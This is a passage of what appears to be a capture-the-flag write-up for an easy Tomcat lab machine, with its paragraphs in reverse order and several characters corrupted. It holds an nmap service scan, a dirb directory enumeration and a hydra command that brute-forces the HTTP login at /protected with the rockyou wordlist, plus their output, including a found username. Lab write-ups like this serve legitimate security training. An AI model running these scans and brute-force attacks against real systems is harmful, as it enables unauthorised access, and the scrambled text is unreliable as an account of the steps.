Hydra () finished at we know the user and we brute forced the password with hydra let's dig more and see what we can do with our results so far host: 10.10.27.83 login: bob password: xxxxxxxġ of 1 target successfully completed, 1 valid password found Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. WORDLIST_FILES: /usr/share/dirb/wordlists/common.txtĭOWNLOADED: 9224 - FOUND: we have a message in directory /guidelines for Mr bob that forgot maybe to update the Tomcat server and another one /protected that tells us that we are visiting the wrong port, that's fine because we have more in port 1234 hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.27.83 http-get /protected Nmap done: 1 IP address (1 host up) scanned in 8.18 have 22 SSH, 80 HTTP, and another HTTP on 1234 running Tomcat and 8009 for ajp13 let's have a look what we are dealing with on 80 and check if there's any open directories so we can understand more what we are trying to break dirb Service Info: OS: Linux CPE: cpe:/o:linux:linux_kernel |_ajp-methods: Failed to get a valid response for the OPTION request |_http-title: Site doesn't have a title (text/html).ġ234/tcp open http Apache Tomcat/Coyote JSP engine 1.1Ĩ009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_http-server-header: Apache/2.4.18 (Ubuntu) Nmap scan report for (10.10.27.83)Ģ2/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux protocol 2.0) Let's enumerate the machine nmap -sC -sV 10.10.27.83 ![]() ![]() Hello all, today's challenge is made by, it's a fun CTF ratted as easy, totally straight forward.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |